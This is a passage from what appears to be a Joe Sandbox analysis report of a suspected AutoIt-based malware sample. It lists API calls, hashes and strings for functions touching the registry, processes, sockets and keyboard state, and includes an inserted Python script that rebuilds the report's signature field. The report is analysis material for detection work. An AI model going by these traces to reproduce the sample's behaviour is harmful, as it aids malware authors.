                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast_strlen$htonsinet_ntoaselect
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3480843537-0
                                                                                                                                                    • Opcode ID: beee084eba7869c93645375da9bbaa4228fac24f0155f1ba3b8b6d5801b9e0b5
                                                                                                                                                    • Instruction ID: db3c292f0ced8581431eef175874fda3a8fe6de69e895fec935f22d647b315a4
                                                                                                                                                    • Opcode Fuzzy Hash: beee084eba7869c93645375da9bbaa4228fac24f0155f1ba3b8b6d5801b9e0b5
                                                                                                                                                    • Instruction Fuzzy Hash: B481AC71504200EFD724EF64CC89F6BB7A8EB89710F144A1DF6559B292EB38DD04CBA2
                                                                                                                                                    APIs
                                                                                                                                                    • __mtinitlocknum.LIBCMT ref: 0075A991
                                                                                                                                                      • Part of subcall function 00757D7C: __FF_MSGBANNER.LIBCMT ref: 00757D91
                                                                                                                                                      • Part of subcall function 00757D7C: __NMSG_WRITE.LIBCMT ref: 00757D98
                                                                                                                                                      • Part of subcall function 00757D7C: __malloc_crt.LIBCMT ref: 00757DB8
                                                                                                                                                    • __lock.LIBCMT ref: 0075A9A4
                                                                                                                                                    • __lock.LIBCMT ref: 0075A9F0
                                                                                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,007E6DE0,00000018,00765E7B,?,00000000,00000109), ref: 0075AA0C
                                                                                                                                                    • EnterCriticalSection.KERNEL32(8000000C,007E6DE0,00000018,00765E7B,?,00000000,00000109), ref: 0075AA29
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(8000000C), ref: 0075AA39
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1422805418-0
                                                                                                                                                    • Opcode ID: b9716753247762680d9657e96432c187dd1afc9fe2c4277f1cabf8b2613fff26
                                                                                                                                                    • Instruction ID: c89aefde85fbf841f8ddcd9d08063d052d473d9faf1bf522d47a50c96a35711a
                                                                                                                                                    • Opcode Fuzzy Hash: b9716753247762680d9657e96432c187dd1afc9fe2c4277f1cabf8b2613fff26
                                                                                                                                                    • Instruction Fuzzy Hash: 6E412B71900205EBEB14DF68D9447D8B7A06F01326F10C339EC25AB2D2EBFC9949CB95
                                                                                                                                                    APIs
                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00798EE4
                                                                                                                                                    • GetDC.USER32(00000000), ref: 00798EEC
                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00798EF7
                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00798F03
                                                                                                                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00798F3F
                                                                                                                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00798F50
                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0079BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00798F8A
                                                                                                                                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00798FAA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3864802216-0
                                                                                                                                                    • Opcode ID: bd72dc4f1efb42323c4b5228fbed5dc2a0b65f48f90e134907d53fc0664d0bc3
                                                                                                                                                    • Instruction ID: 33d1a7ac5cb5aadb1dcd7566ac162f97c2c691535fd6b9f3dd85eee4f9497cb5
                                                                                                                                                    • Opcode Fuzzy Hash: bd72dc4f1efb42323c4b5228fbed5dc2a0b65f48f90e134907d53fc0664d0bc3
                                                                                                                                                    • Instruction Fuzzy Hash: D7316D72100214BFEF208F50DC4AFEA3BAAEF4A755F044165FE09DA191D6799C41CB74
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0074B34E: GetWindowLongW.USER32(?,000000EB), ref: 0074B35F
                                                                                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 007A016D
                                                                                                                                                    • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 007A038D
                                                                                                                                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 007A03AB
                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?), ref: 007A03D6
                                                                                                                                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 007A03FF
                                                                                                                                                    • ShowWindow.USER32(00000003,00000000), ref: 007A0421
                                                                                                                                                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 007A0440
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3356174886-0
                                                                                                                                                    • Opcode ID: 3912f1effcfe8ba263d56faf4b0ae24814f9e4f7557a877510929c296fa99325
                                                                                                                                                    • Instruction ID: 8f5096d9d50e31159bb334e9ebf3487f5f4663e4923b1f574a65a7ca843ae654
                                                                                                                                                    • Opcode Fuzzy Hash: 3912f1effcfe8ba263d56faf4b0ae24814f9e4f7557a877510929c296fa99325
                                                                                                                                                    • Instruction Fuzzy Hash: DEA1A135600616EFDF18CF68C9897BDBBB1BF8A741F048619ED549B290D738AD50CB90
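The "API ID" in each record's Similarity block is a token signature that Joe Sandbox derives from the function's API list, and it is the one field here a practitioner can rebuild without the vendor's hashing (the numeric "API String ID" is not reproducible from the page). The script below is an added example, not Joe Sandbox code: its derivation rule is inferred from the five complete records on this page and is stated as an assumption, not as the vendor's documented algorithm. Observed on those records: CamelCase words of at least four letters are kept (so Get, Reg, Box, And, DC and the trailing W drop out), all-lowercase CRT and BSD-socket names (_strlen, __lock, htons, inet_ntoa) are kept whole, "Part of subcall function" entries count like direct calls, ordinal imports such as #17 and ALLCAPS internals such as __FF_MSGBANNER contribute nothing, and tokens are grouped into tiers by occurrence count (most frequent first), ASCII-sorted within a tier and joined with "$". The sample text is copied from the APIs blocks of the RegConnectRegistryW, Winsock and CriticalSection records above; the function and regex names are the example's own.

```python
"""Reconstruct Joe Sandbox's per-function "API ID" from a record's APIs list.
The rule below is inferred from the records on this page; it reproduces every
complete record here but is an assumption, not vendor documentation."""
import re
from collections import Counter

# Constructed sample: the APIs lines and declared API ID of three complete
# function records, copied from this report and trimmed to those lines.
SAMPLE = """\
APIs
  • Part of subcall function 00793C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00792BB5,?,?), ref: 00793C1D
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00792BF6
• API ID: BuffCharConnectRegistryUpper
APIs
• select.WSOCK32 ref: 00789691
• WSAGetLastError.WSOCK32(00000000), ref: 0078969E
• __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 007896C8
• #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 007896E9
• WSAGetLastError.WSOCK32(00000000), ref: 007896F8
• htons.WSOCK32(?,?,?,00000000,?), ref: 007897AA
• inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,007CDC00), ref: 00789765
  • Part of subcall function 0076D2FF: _strlen.LIBCMT ref: 0076D309
• _strlen.LIBCMT ref: 00789800
• API ID: ErrorLast_strlen$htonsinet_ntoaselect
APIs
• __mtinitlocknum.LIBCMT ref: 0075A991
  • Part of subcall function 00757D7C: __FF_MSGBANNER.LIBCMT ref: 00757D91
  • Part of subcall function 00757D7C: __NMSG_WRITE.LIBCMT ref: 00757D98
  • Part of subcall function 00757D7C: __malloc_crt.LIBCMT ref: 00757DB8
• __lock.LIBCMT ref: 0075A9A4
• __lock.LIBCMT ref: 0075A9F0
• InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,007E6DE0,00000018,00765E7B,?,00000000,00000109), ref: 0075AA0C
• EnterCriticalSection.KERNEL32(8000000C,007E6DE0,00000018,00765E7B,?,00000000,00000109), ref: 0075AA29
• LeaveCriticalSection.KERNEL32(8000000C), ref: 0075AA39
• API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
"""

# "• [Part of subcall function XXXXXXXX: ]NAME.MODULE(" or "NAME.MODULE ref:"
API_LINE = re.compile(r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
                      r"([^\s(.]+)\.([A-Za-z0-9_]+)(?=\(|\s)")
ID_LINE = re.compile(r"^\s*•\s*API ID:\s*(.*?)\s*$")
CAMEL = re.compile(r"[A-Z][a-z]+")          # one CamelCase word, e.g. "Critical"
PLAIN = re.compile(r"^_*[a-z][a-z0-9_]*$")  # CRT/BSD-style names are kept whole


def parse_records(text):
    """Return [(api_names, declared_api_id)] per record. Subcall APIs count
    like direct ones; duplicates are kept because occurrence count matters."""
    records, apis = [], []
    for line in text.splitlines():
        if line.strip() == "APIs":
            apis = []
            continue
        m = ID_LINE.match(line)
        if m:
            records.append((apis, m.group(1)))
            apis = []
            continue
        m = API_LINE.match(line)
        if m:
            apis.append(m.group(1))
    return records


def tokens(name):
    """Tokens an API name contributes (assumed rule): all-lowercase names whole,
    otherwise its CamelCase words of four or more letters. Ordinal imports
    such as #17 and ALLCAPS names such as __NMSG_WRITE contribute nothing."""
    if PLAIN.match(name):
        return [name]
    return [t for t in CAMEL.findall(name) if len(t) >= 4]


def api_id(apis):
    """Tier tokens by occurrence count (highest first), ASCII-sort each tier
    and join the tiers with '$'."""
    counts = Counter(t for n in apis for t in tokens(n))
    tiers = sorted(set(counts.values()), reverse=True)
    return "$".join("".join(sorted(t for t in counts if counts[t] == c)) for c in tiers)


def check(text=SAMPLE):
    """Return [(derived, declared)] so any mismatch can be inspected."""
    return [(api_id(apis), declared) for apis, declared in parse_records(text)]


if __name__ == "__main__":
    for derived, declared in check():
        print("OK " if derived == declared else "BAD", derived, "|", declared)
```

Because the tier structure carries call frequency, two functions whose API IDs match are usually the same library routine (here, AutoIt runtime code) even when their addresses and fuzzy hashes differ between builds, which makes the field a cheap pivot for comparing function records across samples before reaching for the instruction fuzzy hash.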
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 64a70afe27f00c83b9c1fc9926b69a79aadd9e0e29a3949024f8854df2d826dc
• Instruction ID: 88f3c83273fb40fe6437afdb99277266b1c06df9f70e3ebe68913c3f48f05dce
• Opcode Fuzzy Hash: 64a70afe27f00c83b9c1fc9926b69a79aadd9e0e29a3949024f8854df2d826dc
• Instruction Fuzzy Hash: 7A718BB1904109FFDB14CF98CC88AAEBB74FF89314F148259F915AA250C338EA05CF65
APIs
• _memset.LIBCMT ref: 0079225A
• _memset.LIBCMT ref: 00792323
• ShellExecuteExW.SHELL32(?), ref: 00792368
  • Part of subcall function 0073936C: __swprintf.LIBCMT ref: 007393AB
  • Part of subcall function 0073936C: __itow.LIBCMT ref: 007393DF
  • Part of subcall function 0074C6F4: _wcscpy.LIBCMT ref: 0074C717
• CloseHandle.KERNEL32(00000000), ref: 0079242F
• FreeLibrary.KERNEL32(00000000), ref: 0079243E
Strings
Similarity
• API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
• String ID: @
• API String ID: 4082843840-2766056989
• Opcode ID: f0326933f430b4c51ce9b69abe08f0cea80c773b184acc800dd962857b721b8f
• Instruction ID: 18f5945dc9fa1a8b11ff8aeba715f89977e11e68999263745c1e63e820905d24
• Opcode Fuzzy Hash: f0326933f430b4c51ce9b69abe08f0cea80c773b184acc800dd962857b721b8f
• Instruction Fuzzy Hash: C371A0B0A00619EFCF05EFA4D8859AEB7F5FF48310F118059E855AB362DB38AD41CB90
APIs
• GetParent.USER32(00000000), ref: 00773C02
• GetKeyboardState.USER32(?), ref: 00773C17
• SetKeyboardState.USER32(?), ref: 00773C78
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00773CA4
• PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00773CC1
• PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00773D05
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00773D26
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: 733388729636a830b4e51cef9949e8165a1210625ae2813c11558f3d8f870a71
• Instruction ID: ee3cbc5a05fc8657cdb68c62ae905f0c728038e6b5f59083ee52248c7102cc50
• Opcode Fuzzy Hash: 733388729636a830b4e51cef9949e8165a1210625ae2813c11558f3d8f870a71
• Instruction Fuzzy Hash: B351D3A06047D539FF3683248C45BB6BEA9AB06384F08C589E0DD5A4C2D39DEE94F760
APIs
• RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00793DA1
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00793DCB
• FreeLibrary.KERNEL32(00000000), ref: 00793E80
  • Part of subcall function 00793D72: RegCloseKey.ADVAPI32(?), ref: 00793DE8
  • Part of subcall function 00793D72: FreeLibrary.KERNEL32(?), ref: 00793E3A
  • Part of subcall function 00793D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00793E5D
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00793E25
Similarity
• API ID: EnumFreeLibrary$CloseDeleteOpen
• String ID:
• API String ID: 395352322-0
• Opcode ID: dd681e2dea89df5a356046cad70d899290c21f6b90f07b7ed44254fe77199d1a
• Instruction ID: dc6d8bfaa447e0e6f6eb0bd56ca205983df78f951c2ba24ecb5fa6fb59507f07
• Opcode Fuzzy Hash: dd681e2dea89df5a356046cad70d899290c21f6b90f07b7ed44254fe77199d1a
• Instruction Fuzzy Hash: F731C9B1911109BFDF159F94EC89EFFB7BCEF08300F00416AE512A2151E6789F899BA4
APIs
• SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00798FE7
• GetWindowLongW.USER32(0103DFF8,000000F0), ref: 0079901A
• GetWindowLongW.USER32(0103DFF8,000000F0), ref: 0079904F
• SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00799081
• SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 007990AB
• GetWindowLongW.USER32(00000000,000000F0), ref: 007990BC
• SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 007990D6
Similarity
• API ID: LongWindow$MessageSend
• String ID:
• API String ID: 2178440468-0
• Opcode ID: 74b063f23f530e48224c6010059c1a63a0d41e83a0ef28d616eec3d91d964264
• Instruction ID: f8d8172f98d10499f68033c5d36ada8ff44c23c7f2c3a625e8b34e13a9235374
• Opcode Fuzzy Hash: 74b063f23f530e48224c6010059c1a63a0d41e83a0ef28d616eec3d91d964264
• Instruction Fuzzy Hash: 0A310834600216DFEF208F5CEC89F6437A5EB49754F1442A8F6258B2B1CB79AC40DB45
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007708F2
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00770918
• SysAllocString.OLEAUT32(00000000), ref: 0077091B
• SysAllocString.OLEAUT32(?), ref: 00770939
• SysFreeString.OLEAUT32(?), ref: 00770942
• StringFromGUID2.OLE32(?,?,00000028), ref: 00770967
• SysAllocString.OLEAUT32(?), ref: 00770975
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
• Opcode ID: 2e19e0eff26c8a5afe784c7be1ebe82f5e9eafa138fb0bb2940e0172fa9fee0c
• Instruction ID: f0317f78ac7133d18f4060d92e253c9d1fbc5eb2a5cc73497b6716f298623bff
• Opcode Fuzzy Hash: 2e19e0eff26c8a5afe784c7be1ebe82f5e9eafa138fb0bb2940e0172fa9fee0c
• Instruction Fuzzy Hash: 24216776601219EF9F109F78DC88EAB73ACEB09360B00C125F919DB151E678EC458BA4
APIs
Strings
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __wcsnicmp
                                                                                                                                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                                                    • API String ID: 1038674560-2734436370
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007709CB
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007709F1
• SysAllocString.OLEAUT32(00000000), ref: 007709F4
• SysAllocString.OLEAUT32 ref: 00770A15
• SysFreeString.OLEAUT32 ref: 00770A1E
• StringFromGUID2.OLE32(?,?,00000028), ref: 00770A38
• SysAllocString.OLEAUT32(?), ref: 00770A46
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: String$Alloc$ByteCharMultiWide$FreeFrom
• String ID:
• API String ID: 3761583154-0
APIs
  • Part of subcall function 0074D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0074D1BA
  • Part of subcall function 0074D17C: GetStockObject.GDI32(00000011), ref: 0074D1CE
  • Part of subcall function 0074D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0074D1D8
• SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0079A32D
• SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0079A33A
• SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0079A345
• SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0079A354
• SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0079A360
Strings
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: MessageSend$CreateObjectStockWindow
• String ID: Msctls_Progress32
• API String ID: 1025951953-3636473452
APIs
• GetClientRect.USER32(?,?), ref: 0074CCF6
• GetWindowRect.USER32(?,?), ref: 0074CD37
• ScreenToClient.USER32(?,?), ref: 0074CD5F
• GetClientRect.USER32(?,?), ref: 0074CE8C
• GetWindowRect.USER32(?,?), ref: 0074CEA5
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: Rect$Client$Window$Screen
• String ID:
• API String ID: 1296646539-0
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 00791C18
• Process32FirstW.KERNEL32(00000000,?), ref: 00791C26
• __wsplitpath.LIBCMT ref: 00791C54
  • Part of subcall function 00751DFC: __wsplitpath_helper.LIBCMT ref: 00751E3C
• _wcscat.LIBCMT ref: 00791C69
• Process32NextW.KERNEL32(00000000,?), ref: 00791CDF
• CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00791CF1
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
• String ID:
• API String ID: 1380811348-0
APIs
  • Part of subcall function 00793C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00792BB5,?,?), ref: 00793C1D
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007930AF
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007930EF
• RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00793112
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0079313B
• RegCloseKey.ADVAPI32(?,?,00000000), ref: 0079317E
• RegCloseKey.ADVAPI32(00000000), ref: 0079318B
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
• String ID:
• API String ID: 3451389628-0
APIs
• GetMenu.USER32(?), ref: 00798540
• GetMenuItemCount.USER32(00000000), ref: 00798577
• GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0079859F
• GetMenuItemID.USER32(?,?), ref: 0079860E
• GetSubMenu.USER32(?,?), ref: 0079861C
• PostMessageW.USER32(?,00000111,?,00000000), ref: 0079866D
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: Menu$Item$CountMessagePostString
• String ID:
• API String ID: 650687236-0
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 00774B10
                                                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00774B5B
                                                                                                                                                    • IsMenu.USER32(00000000), ref: 00774B7B
                                                                                                                                                    • CreatePopupMenu.USER32 ref: 00774BAF
                                                                                                                                                    • GetMenuItemCount.USER32(000000FF), ref: 00774C0D
                                                                                                                                                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00774C3E
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3311875123-0
                                                                                                                                                    APIs
                                                                                                                                                    • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,007CDC00), ref: 00788E7C
                                                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00788E89
                                                                                                                                                    • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00788EAD
                                                                                                                                                    • #16.WSOCK32(?,?,00000000,00000000), ref: 00788EC5
                                                                                                                                                    • _strlen.LIBCMT ref: 00788EF7
                                                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00788F6A
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$_strlenselect
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2217125717-0
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0074B34E: GetWindowLongW.USER32(?,000000EB), ref: 0074B35F
                                                                                                                                                    • BeginPaint.USER32(?,?,?), ref: 0074AC2A
                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0074AC8E
                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 0074ACAB
                                                                                                                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0074ACBC
                                                                                                                                                    • EndPaint.USER32(?,?,?,?,?), ref: 0074AD06
                                                                                                                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 007AE673
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2592858361-0
                                                                                                                                                    APIs
                                                                                                                                                    • ShowWindow.USER32(007F1628,00000000,007F1628,00000000,00000000,007F1628,?,007ADC5D,00000000,?,00000000,00000000,00000000,?,007ADAD1,00000004), ref: 0079E40B
                                                                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 0079E42F
                                                                                                                                                    • ShowWindow.USER32(007F1628,00000000), ref: 0079E48F
                                                                                                                                                    • ShowWindow.USER32(00000000,00000004), ref: 0079E4A1
                                                                                                                                                    • EnableWindow.USER32(00000000,00000001), ref: 0079E4C5
                                                                                                                                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0079E4E8
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 642888154-0
                                                                                                                                                    APIs
                                                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 007798D1
                                                                                                                                                      • Part of subcall function 0074F4EA: std::exception::exception.LIBCMT ref: 0074F51E
                                                                                                                                                      • Part of subcall function 0074F4EA: __CxxThrowException@8.LIBCMT ref: 0074F533
                                                                                                                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00779908
                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00779924
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0077999E
                                                                                                                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 007799B3
                                                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 007799D2
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2537439066-0
                                                                                                                                                    APIs
                                                                                                                                                    • GetForegroundWindow.USER32(?,?,?,?,?,?,007877F4,?,?,00000000,00000001), ref: 00789B53
                                                                                                                                                      • Part of subcall function 00786544: GetWindowRect.USER32(?,?), ref: 00786557
                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00789B7D
                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 00789B84
                                                                                                                                                    • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00789BB6
                                                                                                                                                      • Part of subcall function 00777A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00777AD0
